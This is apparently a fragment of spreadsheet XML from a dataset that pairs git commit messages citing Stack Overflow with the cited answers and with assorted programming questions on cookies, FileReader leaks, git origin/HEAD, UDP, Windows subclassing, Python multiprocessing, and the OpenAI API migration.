E.g. there will be a single call into the WCF layer on physical box 1, e.g. EditEntity(...).  This call will trigger 2 writes to the database.  After the first write another client calls EditEntity(...) for the same entity on a second instance of my WCF service on a second physical box.  On the second box how do I know that a transaction for this particular entity is already in play?
Thanks.
</t>
  </si>
  <si>
    <t>C667</t>
  </si>
  <si>
    <t>use SameSite=Lax instead of SameSite=Strict
To improve reliability of live streams (#59) on Safari.
Safari was dropping the cookie from websocket update requests.
(But it worked sometimes. I don't get why.) I saw folks on the Internet
thinking this related to HttpOnly:
*   https://developer.apple.com/forums/thread/104488
*   https://stackoverflow.com/q/47742807/23584
but I still see this behavior without HttpOnly. SameSite=Strict vs
SameSite=Lax appears to make a difference. Try that instead.
SameSite=Strict is pointless for us anyway as noted in a new comment.
Turning off HttpOnly would be more unfortunate security-wise.</t>
  </si>
  <si>
    <t>TLDR: it's the
HttpOnly
flag.
It appears that while some browsers
do
allow
Set-Cookie
header in a response for WebSocket connection to have
HttpOnly
flag, iOS Safari considers the situation as "non-HTTP" and blocks this.
Interestingly, while setting
HttpOnly
cookies is not possible,
HttpOnly
cookies are sent in request headers while connecting a WebSocket. This leaves a pair of options:
Increase risk and omit
HttpOnly
;
Set your cookies with another plain HTTP request, quite possibly one that doesn't even have a response body.
I'd consider iOS Safari's behavior to be incorrect compared to what's outlined in
RFC 6265 Storage model</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have the following property&lt;/p&gt;
&lt;pre class="lang-none prettyprint-override"&gt;&lt;code&gt;#property indicator_chart_window
#property indicator_buffers 1
#property indicator_plots 1
#property indicator_label1  &amp;quot;Trendline&amp;quot;
#property indicator_type1   DRAW_LINE
#property indicator_color1  clrBlue
#property indicator_style1  STYLE_SOLID
#property indicator_width1  2
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;I initialise the buffer as follows&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;    // Set up the indicator buffer
    SetIndexBuffer(0, trendlineBuffer, INDICATOR_DATA);
    // Initialize the buffer with zeroes
    ArrayInitialize(trendlineBuffer, 0.0);
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;In OnCalculate, I want to update my buffer with prices for drawing the line&lt;/p&gt;
&lt;pre class="lang-none prettyprint-override"&gt;&lt;code&gt;    // Ensure there are enough bars to draw the trendline
    if (rates_total &amp;lt; endBar)
    {
        Print(&amp;quot;Not enough bars to draw the trendline.&amp;quot;);
        return(0);
    }
    // Reset buffer
    ArrayInitialize(trendlineBuffer, 0.0);
    // Get the time and prices for the three points
    double price1 = close[startBar];
    double price2 = close[middleBar];
    double price3 = close[endBar];
    // Calculate the slope and intercept of the trendline from start to middle
    double slope1 = (price2 - price1) / (middleBar - startBar);
    double intercept1 = price1 - slope1 * startBar;
    // Calculate the slope and intercept of the trendline from middle to end
    double slope2 = (price3 - price2) / (endBar - middleBar);
    double intercept2 = price2 - slope2 * middleBar;
    // Fill the buffer with values to draw the trendline
    for (int i = startBar; i &amp;lt;= middleBar; i++)
    {
        trendlineBuffer[i] = slope1 * i + intercept1;
    }
    for (int i = middleBar; i &amp;lt;= endBar; i++)
    {
        trendlineBuffer[i] = slope2 * i + intercept2;
    }
    return(rates_total);
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;If I could at least see a blue line being drawn I would know I am on the right track. Right now no line is drawn&lt;/p&gt;
</t>
  </si>
  <si>
    <t>C668</t>
  </si>
  <si>
    <t>FileReader should remove event handlers to avoid memory leaks (#17434)
* FileReader should remove event handlers to avoid memory leaks
FileReader can leak memory if the events are not cleaned up with removeEventListener. This can lead to unexpected performance and reliability issues in long-running applications (e.g. SPAs). Creating this documentation update PR because I spent days trying to pinpoint the memory leak in our SPA and because a very large amount of npm packages use FileReader without cleaning up the event listeners.
See https://stackoverflow.com/questions/72663368/filereader-page-memory-leak/72676857 for more details.</t>
  </si>
  <si>
    <t>Webkit Inspector was misleading/indicating a red herring problem in that it was showing page memory increase, but only while the Inspector tool was open and recording the timeline. I did another experiment where I used the file picker to open files many times in a row and only then started recording the timeline in the Inspector - it showed memory to not be elevated.
The actual issue in our app turned out to be caused by code not cleaning up the FileReader event handlers. There were several places where a FileReader was used without cleanup, including an external image resizing library.
There are two area for improvement that I see:
Online docs (such as MDN) should be updated to reflect correct FileReader usage - seems like most npm packages out there are not cleaning up the event handlers, which can cause memory leaks over time in long-running applications.
Webkit Inspector can be improved by correctly showing the page memory allocation, so that people don't chase after red herrings.</t>
  </si>
  <si>
    <t xml:space="preserve">In my application, I've got several ViewModels that have a single service (repository, DAO, whatever), let's call it the WidgetService, injected into them.  
Let's say that one of these ViewModels is a listing of all of a users widgets.  Another could be the ViewModel for editing/creating a single one of these Widgets.
The user can view the list of widgets in the WidgetListView backed by a WidgetListViewModel and click a button to add a new widget.  To create this new Widget, a CreateWidgetViewModel is new'd up and injected into the DataContext of some UserControl/Window thus, through the magic of DataTemplates displaying the CreateWidgetViewModel in a CreateWidgetView.  Also, the newing up of the CreateWidgetViewModel does not necessarily happen within the scope of the WidgetListViewModel.
When the WidgetListViewModel it was injected with an instance of the WidgetService .  The CreateWidgetViewModel was injected with this same WidgetService instance.
Now, when the user clicks save in the CreateWidgetView the Save method on the WidgetService will be invoked and the widget will be persisted.  Now the WidgetListViewModel needs to be notified that there is a new Widget to be displayed!
The long buildup leads to this question: How do I let the WidgetListViewModel know that it needs to display the new Widget?
I've seen a [external-link] in which a guy from Microsoft does this sort of thing using an event on the service that the ViewModel subscribes to.  However, the downfall of this is that if the service outlives the viewmodel, then the viewmodel wont get GC'd until the service is GC'd.  I could add IDisposable to the ViewModel. But then when/how to call Dispose when the ViewModel is only represented in the UI via DataTemplates?
Does anyone have any suggestions regarding this?
To clarify, I'd say my interpretation of MVVM most closely resembles Josh Smith's. At least in as much as my MVVM architecture pretty closely matches that found in the Crack.Net source.
</t>
  </si>
  <si>
    <t>C669</t>
  </si>
  <si>
    <t>Implement load, save and play features
- load : add the control class and a little input control: check if the path is
not None and if the file exists
- save : add the control class and write to a temporary file, note that the
os module has been used instead of tempfile because of reliability and
permissions management, see https://stackoverflow.com/a/58955530/8873120
- play : add a control class that basically runs the temporary file (which is
therefore like a buffer for our program), the underlying module Popen has been
used directly because it's non-blocking and unlike subprocess.check_output it
doesn't raise and exception if there is an error</t>
  </si>
  <si>
    <t>NamedTemporaryFile
actually
creates and opens
the file for you, there's no need for you to open it again for writing.
In fact, the
Python docs
state:
Whether the name can be used to open the file a second time, while the named temporary file is still open, varies across platforms (it can be so used on Unix;
it cannot on Windows NT or later
).
That's why you're getting your permission error. What you're probably after is something like:
f = tempfile.NamedTemporaryFile(mode='w') # open file
temp = f.name                             # get name (if needed)</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have a dump of the msbuild process which crashes with OutOfMemory exception in the following call stack:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;0:053&amp;gt; !mk
Thread 53:
        SP       IP
00:U 0747e070 76fbf3ec ntdll!NtWaitForMultipleObjects+0xc
01:U 0747e074 74d64ae0 KERNELBASE!WaitForMultipleObjectsEx+0xf0
02:U 0747e208 74d649d8 KERNELBASE!WaitForMultipleObjects+0x18
03:U 0747e224 744971f2 kernel32!WerpReportFaultInternal+0x59d
04:U 0747e6a0 74496c36 kernel32!WerpReportFault+0x9b
05:U 0747e6bc 7446e629 kernel32!BasepReportFault+0x19
06:U 0747e6c4 74ded71a KERNELBASE!UnhandledExceptionFilter+0x25a
07:U 0747e75c 76fec6e1 ntdll!__RtlUserThreadStart+0x3be57
08:M 0747f584 718ab33b System.IO.MemoryStream.set_Capacity(Int32)(+0x57 IL,+0x5b Native)
09:M 0747f598 718ab3c3 System.IO.MemoryStream.EnsureCapacity(Int32)(+0x68 IL,+0x53 Native)
0a:M 0747f5a8 718b816a System.IO.MemoryStream.SetLength(Int64)(+0x60 IL,+0xba Native)
0b:M 0747f5c4 6ebe93e6 Microsoft.Build.BackEnd.NodeProviderOutOfProcBase+NodeContext.HeaderReadComplete(System.IAsyncResult)(+0x96 IL,+0x1f6 Native) [/_/src/Build/BackEnd/Components/Communications/NodeProviderOutOfProcBase.cs @ 959,17]
0c:M 0747f600 7032a6d6 System.IO.Pipes.PipeStream.AsyncPSCallback(UInt32, UInt32, System.Threading.NativeOverlapped*)(+0xa6 Native)
0d:M 0747f618 7193565d System.Threading._IOCompletionCallback.PerformIOCompletionCallback(UInt32, UInt32, System.Threading.NativeOverlapped*)(+0x78 IL,+0x8d Native)
0e:U 0747fa70 76fb0884 ntdll!_RtlUserThreadStart+0x1b
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Inspecting the stack frames does not help:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;0:053&amp;gt; !mframe a
0:053&amp;gt; !mdv
Frame 0xa: (System.IO.MemoryStream.SetLength(Int64)):
[A0]:this: &amp;lt;UNAVAILABLE&amp;gt; (System.IO.MemoryStream)
[A1]:value: &amp;lt;UNAVAILABLE&amp;gt; (System.Int64)
[L0]: &amp;lt;UNAVAILABLE&amp;gt; (System.Int32)
[L1]: &amp;lt;UNAVAILABLE&amp;gt; (System.Boolean)
0:053&amp;gt; !mframe 9
0:053&amp;gt; !mdv
Frame 0x9: (System.IO.MemoryStream.EnsureCapacity(Int32)):
[A0]:this: &amp;lt;UNAVAILABLE&amp;gt; (System.IO.MemoryStream)
[A1]:value: &amp;lt;UNAVAILABLE&amp;gt; (System.Int32)
[L0]: &amp;lt;UNAVAILABLE&amp;gt; (System.Int32)
0:053&amp;gt; !mframe 8
0:053&amp;gt; !mdv
Frame 0x8: (System.IO.MemoryStream.set_Capacity(Int32)):
[A0]:this: &amp;lt;UNAVAILABLE&amp;gt; (System.IO.MemoryStream)
[A1]:value: &amp;lt;UNAVAILABLE&amp;gt; (System.Int32)
[L0]: &amp;lt;UNAVAILABLE&amp;gt; (System.Byte[])
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;There is nothing helpful, as far as I can see, on the stack:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;0:053&amp;gt; !mdso
Thread 53:
Location          Object            Type
------------------------------------------------------------
0747e850  01a38ac0  System.Threading.Tasks.TplEtwProvider
0747ef54  01fe1ff0  System.Byte[]
0747ef58  01d09c04  System.Threading.OverlappedData
0747f20c  56301c60  Microsoft.Build.Framework.BuildEventContext
0747f2cc  55ff5128  System.OutOfMemoryException
0747f4ec  020fde88  System.IO.MemoryStream
0747f5ac  01c9f454  Microsoft.Build.BackEnd.NodeProviderOutOfProcBase+NodeContext
0747f730  01d09524  System.Threading.OverlappedData
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Now I can inspect the &lt;code&gt;System.IO.MemoryStream&lt;/code&gt; object to get its capacity BEFORE the attempt that causes the OOM (I assume that is the instance in question):&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;0:053&amp;gt; !mdt 020fde88
020fde88 (System.IO.MemoryStream)
    __identity:NULL (System.Object)
    _activeReadWriteTask:NULL (System.IO.Stream+ReadWriteTask)
    _asyncActiveSemaphore:NULL (System.Threading.SemaphoreSlim)
    _buffer:80011010 (System.Byte[])
    _origin:0x0 (System.Int32)
    _position:0x0 (System.Int32)
    _length:0x2d468088 (System.Int32)
    _capacity:0x2d468088 (System.Int32)
    _expandable:true (System.Boolean)
    _writable:true (System.Boolean)
    _exposable:true (System.Boolean)
    _isOpen:true (System.Boolean)
    _lastReadTask:NULL (System.Threading.Tasks.Task`1[[System.Int32, mscorlib]])
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;And it is already quite big - 0x2d468088 bytes, i.e. ~724MB and because its &lt;code&gt;_length == _capacity&lt;/code&gt; it makes sense msbuild is trying to resize it even more and beyond the 724MB, which results in OOM.&lt;/p&gt;
&lt;p&gt;What I am unable to understand is how can I get this new desired capacity from the dump, if at all?&lt;/p&gt;
&lt;p&gt;I know it is probably insignificant in the analysis of this OOM, but for the sake of the science  - is it possible to figure out this value from this dump?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>C67</t>
  </si>
  <si>
    <t>allows node to serve static pages + new pattern for data model classe
s (source: http://stackoverflow.com/questions/3225251/how-can-i-share-code-between-node-js-and-the-browser )</t>
  </si>
  <si>
    <t>If you want to write a module that can be used both client side and server side, I have a short blog post on a quick and easy method: Writing for Node.js and the browser, essentially the following (where this is the same as window):
(function(exports){
    // Your code goes here
   exports.test = function(){
        return 'hello world'
    };
})(typeof exports === 'undefined'? this['mymodule']={}: exports);
Alternatively there are some projects aiming to implement the Node.js API on the client side, such as Marak's gemini.
You might also be interested in DNode, which lets you expose a JavaScript function so that it can be called from another machine using a simple JSON-based network protocol.</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I am trying to embed a short video in a website.&lt;/p&gt;
&lt;p&gt;I can either get it to autoplay or get it to have volume...but not both:&lt;/p&gt;
&lt;p&gt;to autoplay:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;&amp;lt;div style=&amp;quot;position: relative; overflow: hidden; aspect-ratio: 1920/1080;&amp;quot;&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;iframe id=&amp;quot;vidFrame&amp;quot; style=&amp;quot;position: absolute; width: 100%; height: 100%; top: 0; left: 0; border: none; padding: 0; margin: 0; overflow: hidden;&amp;quot; title=&amp;quot;The Conclusion People&amp;quot; src=&amp;quot;https://share.synthesia.io/embeds/videos/7b183a6b-3920-4c9d-9e3a-949339411f28?autoplay=1&amp;quot; allowfullscreen=&amp;quot;allowfullscreen&amp;quot;&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;/iframe&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/div&amp;gt;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;to unmute:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;&amp;lt;div style=&amp;quot;position: relative; overflow: hidden; aspect-ratio: 1920/1080;&amp;quot;&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;iframe id=&amp;quot;vidFrame&amp;quot; style=&amp;quot;position: absolute; width: 100%; height: 100%; top: 0; left: 0; border: none; padding: 0; margin: 0; overflow: hidden;&amp;quot; title=&amp;quot;The Conclusion People&amp;quot; src=&amp;quot;https://share.synthesia.io/embeds/videos/7b183a6b-3920-4c9d-9e3a-949339411f28?mute=0&amp;quot; allowfullscreen=&amp;quot;allowfullscreen&amp;quot;&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;/iframe&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/div&amp;gt;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;I have tried several things including;&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;&amp;lt;div style=&amp;quot;position: relative; overflow: hidden; aspect-ratio: 1920/1080;&amp;quot;&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;iframe id=&amp;quot;vidFrame&amp;quot; style=&amp;quot;position: absolute; width: 100%; height: 100%; top: 0; left: 0; border: none; padding: 0; margin: 0; overflow: hidden;&amp;quot; title=&amp;quot;The Conclusion People&amp;quot; src=&amp;quot;https://share.synthesia.io/embeds/videos/7b183a6b-3920-4c9d-9e3a-949339411f28?autoplay=1&amp;amp;mute=0&amp;quot; allowfullscreen=&amp;quot;allowfullscreen&amp;quot;&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;/iframe&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/div&amp;gt;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;I can only get it to do either 1 or the other thing (not both).&lt;/p&gt;
</t>
  </si>
  <si>
    <t>C670</t>
  </si>
  <si>
    <t>Add default branch parameter to RemoteContains.
This is a necessary breaking API change to achieve improved reliability.
Some git repositories will not have the refs/remotes/origin/HEAD ref,
see https://stackoverflow.com/questions/17639383/how-to-add-missing-origin-head-in-git-repo:
&gt; The origin's HEAD is only fetched when you clone the repo.
&gt; If you otherwise add the remote (e.g., by using git remote add or
&gt; by renaming another existing remote), this ref will not exist.
Therefore, the sensible thing to do is require the caller to provide
the default branch via a parameter, similar to Contains method. In
most cases, it will be easy and inexpensive for caller to do that,
since it'll have fetched the default branch by that point.</t>
  </si>
  <si>
    <t>Original Answer:
The origin's
HEAD
is only fetched when you clone the repo. If you otherwise add the remote (e.g. by using
git remote add
or by renaming another existing remote), this ref will not exist,
because there is not reason to have it.
Remote repos should be
bare repos
in most cases, and in bare repos
HEAD
merely points to the "default" branch. This is only relevant at one time: when cloning. Therefore, after cloning, any remote
HEAD
s are no longer important to your clone and Git will not fetch that ref from any remote.
As user
lesmana
requested, I looked into this again to find some more information:
"How to remove
origin/HEAD
?"
You do not have to do this.
The ref has no influence on the way your repo operates, and a ref is literally just a small text file on your file system, so it takes up nearly no space (just a few bytes).
If you still want to remove it, you can use
git update-ref -d refs/remotes/origin/HEAD
(if you want to remove a remote HEAD that is not on
origin
, use the respective remote's name instead).
"How to create
origin/HEAD
?"
As pointed out earlier, a remote HEAD ref is only used for cloning, and never required by Git at a later time. Unless you manually use it (which does not seem very useful, you can just use the branch it points to), there is no reason to manually create it.
Nevertheless, if you absolutely must, you can use
git symbolic-ref refs/remotes/origin/HEAD refs/remotes/origin/master
"Why is a remote HEAD not removed automatically by clone if it really is useless?"
There is no specific reason, from what I can tell, other than maybe inform the user explicitly of which branch is considered the default branch in the cloned remote repo. However, as I mentioned above, its existence causes no problems and uses up almost no space, so there is no real reason to remove it.
For more details, feel free to ask the Git devs directly at the Git mailing list :)
"What is the exact reason why clone needs it?"
None of the man pages explain directly that
git clone
always uses this, but it finds sidelong mentions in some places.
For example,
man git clone
says:
--branch &lt;name&gt;
-b &lt;name&gt;
Instead of pointing the newly created HEAD to the branch pointed to by the cloned repository’s HEAD, point to
&lt;name&gt;
branch instead. [...]
and
--[no-]single-branch
Clone only the history leading to the tip of a single branch, either specified by the
--branch
option or the primary branch remote’s HEAD points at. [...]
Furthermore,
man gitrepository-layout
says:
HEAD
[...] It does not mean much if the repository is not associated with any working tree (i.e. a
bare
repository), but a valid Git repository
must
have the
HEAD
file; some porcelains may use it to guess the designated "default" branch of the repository (usually
master
).
This means that
a) the remote
repo
itself must have the HEAD ref (to be valid), even though it is not semantically important (other than to point out the default branch)
b)
git clone
uses the remote repo's HEAD ref to determine where to point the local
HEAD
(unless you specify an override with
--branch
). To work with that ref, it must locally create it (therefore
origin/HEAD
). As mentioned above, it is then simply not deleted.</t>
  </si>
  <si>
    <t xml:space="preserve">I'd like to know how you address the seemingly low productivity of Java EE-based web application development compared to other technology stacks ([external-link], [external-link], etc).
The constraints are:
The finished web application must be deployable on Java EE compliant application containers
If possible, previous investment in Java-based solution should be preserved, i.e. native interoperability with Java-based systems and libraries should be possible
Due to team structure, Java as implementation language is preferred, although less exotic JVM-based languages (i.e. Groovy) might be acceptable as well
The resulting system needs to be architecturally sound
The resulting system needs to be extensible and maintainable
To not let this dwindle into a philosophical discussion, I'm only interested in suggestions that are based on practical experience. Possible examples include domain specific languages, frameworks and MDSD.
If you point to an abstract class of solutions (like MDA / MDSD), please provide details on how you implemented it as well as information about common pitfalls and best practices.
If you disagree on the assumption that Java EE-based web application development implies inferior productivity, I'd like to hear your reasoning as well.
EDIT: 
As there are a lot less answers than I expected, I'll accept accounts of abortive attempts as well, basically extending the question to "How (not) to improve productivity when developing Java EE based web applications?".
</t>
  </si>
  <si>
    <t>C671</t>
  </si>
  <si>
    <t>Fix clipboard issues on Linux
There were two independent issues preventing this from working on Linux:
- According to [clipboard-ext][ce], the X11 clipboard is cleared when the
  process exits. This crate, which we conditionally compile in for Linux,
  shells out to `xclip` or `xsel` instead.
- Evidently we can't propagate clipboard changes from a spawned `tmux`
  pane to the original pane. So we use a TCP connection as blocking IPC
  to send the matched text from the `main` binary back to the original
  `boot` binary, and execute `xclip` from there.
  Note: `pbcopy` and `pbpaste` didn't have this issue on MacOS, which
  made this a lot simpler.
  Note: Unsure if there's lighter-weight alternative to TCP for IPC?
  - File: race condition across reading from `boot` and writing from `main`.
    Would need either OS-level notify API or hacky sleep timer.
  - UDP: apparently it's still possible to [drop packets to `localhost`][lh].
  - UDS: not supported on Windows.
[ce]: https://crates.io/crates/clipboard-ext
[lh]: https://stackoverflow.com/questions/3034680/reliability-of-udp-on-localhost</t>
  </si>
  <si>
    <t>I repeat a
previous answer
to a related question.  To remain portable always anticipate your UDP sockets might drop packets or receive out of order data.</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Iâ€™m working on an application that uses both the ChatGPT and Genia APIs. After several days of trial and error and going through StackOverflow posts, my code still isnâ€™t working.&lt;/p&gt;
&lt;p&gt;this some code i got off stackoverflow trying to modify it&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;from os import environ
from collections import deque
from datetime import datetime
from functools import lru_cache
import openai
from dotenv import load_dotenv
load_dotenv()
openai.api_key = environ[&amp;quot;OPENAI_API_KEY&amp;quot;]
CHAT_MODEL = &amp;quot;gpt-4&amp;quot;  
PROMPT = &amp;quot;&amp;quot;&amp;quot;Your name is Kim. A kind and friendly AI assistant that answers in a short and concise answer. Give short step-by-step reasoning if required.&amp;quot;&amp;quot;&amp;quot;
class Chat:
    def __init__(self, converstion_limit: int = 8):
        self.messages_queue = deque(maxlen=converstion_limit)
    @lru_cache(maxsize=518)
    def chat(self, message: str) -&amp;gt; str:
        self.messages_queue.append({&amp;quot;role&amp;quot;: &amp;quot;user&amp;quot;, &amp;quot;content&amp;quot;: message})
        try:
            prompty = {
                &amp;quot;role&amp;quot;: &amp;quot;system&amp;quot;, 
                &amp;quot;content&amp;quot;: f&amp;quot;{PROMPT} Today is {datetime.now(): %A %d %B %Y %H:%M}&amp;quot;,
            }
            print(f&amp;quot;Sending request with prompt: {prompty}&amp;quot;)
            response = openai.ChatCompletion.create(
                model=CHAT_MODEL, messages=[prompty, *self.messages_queue]
            )
            reply = response[&amp;quot;choices&amp;quot;][0][&amp;quot;message&amp;quot;][&amp;quot;content&amp;quot;]
            print(f&amp;quot;Response from OpenAI: {reply}&amp;quot;)
            self.messages_queue.append({&amp;quot;role&amp;quot;: &amp;quot;assistant&amp;quot;, &amp;quot;content&amp;quot;: reply})
        except openai.error.OpenAIError as e:
            print(f&amp;quot;OpenAI error occurred: {e}&amp;quot;)
            reply = &amp;quot;An error occurred. Please try again later.&amp;quot;
        except Exception as e:
            print(f&amp;quot;Error: {e}&amp;quot;)
            reply = &amp;quot;An unexpected error occurred.&amp;quot;
        return reply
if __name__ == &amp;quot;__main__&amp;quot;:
    chat_instance = Chat()
    response = chat_instance.chat(&amp;quot;Hello, Testing!&amp;quot;)
    print(f&amp;quot;AI Response: {response}&amp;quot;)```
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;I am getting the following error:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;openai.lib._old_api.APIRemovedInV1: 
You tried to access openai.ChatCompletion, but this is no longer supported in openai&amp;gt;=1.0.0 - see the README at https://github.com/openai/openai-python for the API.
You can run `openai migrate` to automatically upgrade your codebase to use the 1.0.0 interface. 
Alternatively, you can pin your installation to the old version, e.g. `pip install openai==0.28`
A detailed migration guide is available here: https://github.com/openai/openai-python/discussions/742
&lt;/code&gt;&lt;/pre&gt;
&lt;pre&gt;&lt;code&gt;Traceback (most recent call last):
  File &amp;quot;/Users/farajaathanas/Documents/GitHub/Health_Ai_App/app.py&amp;quot;, line 52, in &amp;lt;module&amp;gt;
    response = chat_instance.chat(&amp;quot;Hello, AI!&amp;quot;)
  File &amp;quot;/Users/farajaathanas/Documents/GitHub/Health_Ai_App/app.py&amp;quot;, line 40, in chat
    except openai.error.OpenAIError as e:
           ^^^^^^^^^^^^
AttributeError: module 'openai' has no attribute 'error'
&lt;/code&gt;&lt;/pre&gt;
</t>
  </si>
  <si>
    <t>C672</t>
  </si>
  <si>
    <t>First wave of large-scale subclassing overhaul
Over the past few years, I've become increasingly skeptical of the
3rd-party cSelfSubHookCallback solution for subclassing.  Manually
injecting machine code at run-time is simply problematic, and I've had
to add a bunch of manual fixes to the class to work around some
obnoxious reliability issues.  (I'm also 99% sure that the class is a
primary reason that PD hasn't worked on Wine for quite a few years,
which is an annoying side-effect.)
For a variety of reasons, I've wanted to move to the much-safer,
Wine-friendly comctl32 subclassing technique (nicely outlined here:
http://vb.mvps.org/samples/HookXP/).  The trouble with doing this is
that the transition is not exactly seamless, because not only are the
two approaches very different, but they interfere with each other and
cause user object leaks when intermixed.  (As described here:
http://stackoverflow.com/questions/1120337/setwindowsubclass-is-leaking-user-objects)
I've had to deal with these leaks before when working on tooltips, and
they can become quite severe over long sessions, so this isn't a project
where I can migrate stuff over in small bits.  It's got to be "all or
nothing."
To that end, I've finally started making the transition.  I'm not going
to sync any of my changes until all classes are properly transitioned,
and I *do not* recommend reverting to these intermediary commits unless
absolutely necessary.
First up, this class introduces the ISubclass interface and migrates
over the following subclass-heavy classes:
- pdWindowManager (which got a large-scale rewrite to match)
- pdWindowPainter
- pdWindowSize
- pdWindowSync
Core subclassing helper functions have also been added to the VB_Hacks
module.
The scope of this overhaul means that some other classes are necessarily
going to be affected; for example, pdDictionary is used to track
subclassing handles in a number of places, and I've had to modify it to
improve situations where keys are frequently added and deleted.  Other
classes may have received smaller changes to help with this project;
apologies for not splitting them into their own commits.</t>
  </si>
  <si>
    <t>I think calling this a "leak" is a bit hyperbolic. True, the user object isn't restored when RemoveWindowSubclass is called, but neither is another one allocated when you call SetWindowSubclass again.  You can repeatedly set and remove the hook, and that same user object appears to be reused over and over again for the life of the process.
I did a few more tests that expanded on your simplest-case scenario. Just for background reference, each instance of your form with two command buttons and no window hooks consumes
six
User objects. Calling SetWindowSubclass does indeed consume one more User object
per window class
. That is, I can load multiple instances of that form, and hook the message stream for the form itself as well as both contained command buttons, and consume a total of two User objects. These, as you observe, are not recycled for the life of the process.
Could the internal design be cleaner?  Possibly.  Then again, possibly not.  I don't see this as much cause for concern, at all.  A greater cause for concern would be an application designed such that this
might
be concerning.  In that case, a fundamental reconsideration of the overall UI design may be in order. I simply cannot imagine when you would be subclassing so many window classes in a single process that this extra object for each class could possibly matter.</t>
  </si>
  <si>
    <t xml:space="preserve">Doing some experiments around WCF and Entity Framework. A couple of questions.
Option 1:
I understand that entity framework classes can be serialized over WCF directly, with sp1 onwards. How ever, I would like to know how scenarios like delay loading, eager loading, context management etc is handled in this, if they are handled at all?
Option 2:
Another alternative might be to use EFPocoAdapter, to have a plain POCO wrapper on top of the entity framework, instead of exposing entity framework classes directly. [external-link] . Has anybody used this? Any Thoughts in this direction?
Other Thoughts:
About ADO.NET data services - As I understand ADO.NET data services can't be configured over remoting (nettcp binding)? It supports only http based access. We all know that binary serialization is slower.
Any pointers or any other options?
</t>
  </si>
  <si>
    <t>C673</t>
  </si>
  <si>
    <t>* stepper: create mqtt client during init
Extraction and refactor of the python code from node-red flow
The rationale for this rewrite is to improve the readability, the modularity, the reliability and the future-proofing of the main python script.
The code is separated in four main processes, each with a specific set of responsibilities:
- The main process controls all the others, starts everything up and cleans up on shutdown
- The stepper process manages the stepper movements. It's now possible to have simultaneous movements of both motors (this closes #38 ).
- The imager process controls the camera and the streaming server via a state machine.
- The segmenter process manages the segmentation and its outputs. The segmentation happens recursively in all folders in `/home/pi/PlanktonScope/img/`. Each folder has its own output archive, and bug #26 is now closed.
Those processes communicates together using MQTT and json messages. Each message is adressed to one topic. The high level topic controls which process receives the message. The details of each topic is at the end of this commit message.
* stepper: instanciate the mqtt client inside run
Otherwise it's not accessible from inside the loop. It's a PITA,
more information at  https://stackoverflow.com/questions/17172878/using-pythons-multiprocessing-process-class</t>
  </si>
  <si>
    <t>I often wondered why Python's doc page on
multiprocessing
only shows the "functional" approach (using
target
parameter). Probably because terse, succinct code snippets are best for illustration purposes. For small tasks that fit in one function, I can see how that is the preferred way, ala:
from multiprocessing import Process
def f():
    print('hello')
p = Process(target=f)
p.start()
p.join()
But when you need greater code organization (for complex tasks), making your own class is the way to go:
from multiprocessing import Process
class P(Process):
    def __init__(self):
        super(P, self).__init__()
    def run(self):
        print('hello')
p = P()
p.start()
p.join()
Bear in mind that each spawned process is initialized with a copy of the memory footprint of the master process. And that the constructor code (i.e. stuff inside
__init__()
) is executed in the master process -- only code inside
run()
executes in separate processes.
Therefore, if a process (master or spawned) changes it's member variable, the change will not be reflected in other processes. This, of course, is only true for bulit-in types, like
bool
,
string
,
list
, etc. You can however import "special" data structures from
multiprocessing
module which are then transparently shared between processes (see
Sharing state between processes
.) Or, you can create your own channels of IPC (inter-process communication) such as
multiprocessing.Pipe
and
multiprocessing.Queue
.</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I am trying to use LISTAGG to create one column as a list that is the product of two columns. I am able to execute the query, but when using DISTINCT it still does not remove the duplicate values. Code sample below.&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;CASE WHEN PLA.SALES_CTRY_LIST IS NULL AND PLA.DP_CTRY_LIST IS NOT NULL 
             THEN PLA.DP_CTRY_LIST 
             WHEN PLA.DP_CTRY_LIST IS NULL AND PLA.SALES_CTRY_LIST IS NOT NULL 
             THEN PLA.SALES_CTRY_LIST 
             WHEN PLA.SALES_CTRY_LIST IS NOT NULL AND PLA.DP_CTRY_LIST IS NOT NULL 
             THEN LISTAGG(DISTINCT PLA.SALES_CTRY_LIST ||', '||PLA.DP_CTRY_LIST)
        END AS &amp;quot;TESTING&amp;quot;
&lt;/code&gt;&lt;/pre&gt;
